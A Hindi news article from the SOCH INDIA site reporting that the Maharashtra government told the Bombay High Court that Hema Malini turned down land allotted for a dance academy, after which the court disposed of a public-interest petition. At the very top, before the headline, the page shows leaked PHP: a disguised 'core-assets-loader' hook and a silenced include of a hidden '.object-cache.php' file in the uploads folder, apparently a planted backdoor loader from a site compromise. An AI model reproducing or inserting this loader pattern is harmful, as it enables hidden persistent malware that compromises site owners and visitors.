add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हेमा मालिनी ने डांस एकेडमी के लिए नहीं ली जमीन: महाराष्ट्र सरकार – SOCH INDIA
Menu

मनोरंजन
हेमा मालिनी ने डांस एकेडमी के लिए नहीं ली जमीन: महाराष्ट्र सरकार

nobanner

महाराष्ट्र सरकार ने बॉम्बे हाईकोर्ट को बताया है कि हेमा मालिनी ने डांस एकेडमी खोलने के लिए दी गई जमीन को ठुकरा दिया है. एक आरटीआई एक्टिविस्ट ने दावा किया था कि अभिनेत्री को एकेडमी खोलने के लिए बहुत ही मामूली कीमत पर जमीन उपलब्ध कराई गई थी.

सरकार की बात पर ध्यान देते हुए मुख्य न्यायाधीश मंजुला चेल्लूर की अध्यक्षता वाली पीठ ने आवंटित भूमि को चुनौती देने वाली जनहित याचिका का निपटारा किया.

पूर्व पत्रकार केतन तीरोदकर की याचिका पर सुनवाई करते हुए पीठ ने कहा कि सरकारी वकील प्रियभूषण काकडे के बयान को देखते हुए इस याचिका में कुछ भी नहीं बचा है. हालांकि न्यायधीशों ने याचिकाकर्ता को छूट दी है कि अगर भविष्य में जमीन से संबंधित कोई भी नई बात पता चलती है तो वह नई याचिका डाल सकते हैं.